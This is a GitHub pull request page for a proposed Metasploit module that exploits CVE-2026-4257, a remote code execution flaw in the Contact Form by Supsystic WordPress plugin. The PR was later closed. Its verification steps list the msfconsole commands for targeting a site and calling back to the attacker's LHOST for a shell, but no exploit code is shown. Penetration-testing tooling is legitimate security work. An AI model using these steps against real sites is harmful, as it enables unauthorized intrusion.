Contact Form by Supsystic Wordpress Plugin exploit CVE-2026-4257 by bootstrapbool · Pull Request #21258 · rapid7/metasploit-framework

bootstrapbool · 2026-04-08T23:14:49Z

This change adds a module to exploit CVE-2026-4257 resulting in remote code execution on Wordpress sites with the Contact Form by Supsystic plugin.

Verification

List the steps needed to make sure this thing works

Start msfconsole
use exploit/multi/http/wp_plugin_supsystic_contact_form_rce
set RHOSTS <target>
set TARGETURI <uri to page with contact form> (e.g., /wordpress/index.php/sample-page/)
set LHOST <your_ip>
exploit
On success a shell session will be started
If no FIELD argument is provided, one is automatically detected and used

bootstrapbool added 3 commits April 6, 2026 20:27

[WIP] Adds xerte exploit

ad67ef6

Adds exploit for Contact Form by Supsystic Wordpress plugin

ae03b0c

Merge branch 'master' into supsystic_contact_form_cve_2026_4257

4b5cf33

smcintyre-r7 added this to Metasploit Kanban Apr 8, 2026

github-project-automation bot moved this to Todo in Metasploit Kanban Apr 8, 2026

msutovsky-r7 added the module label Apr 9, 2026

msutovsky-r7 reviewed Apr 9, 2026

View reviewed changes

Comment thread modules/exploits/multi/http/xerte_unauthenticated_mediaupload_rce.rb

bootstrapbool closed this Apr 9, 2026

bootstrapbool deleted the supsystic_contact_form_cve_2026_4257 branch April 9, 2026 20:30

github-project-automation bot moved this from Todo to Done in Metasploit Kanban Apr 9, 2026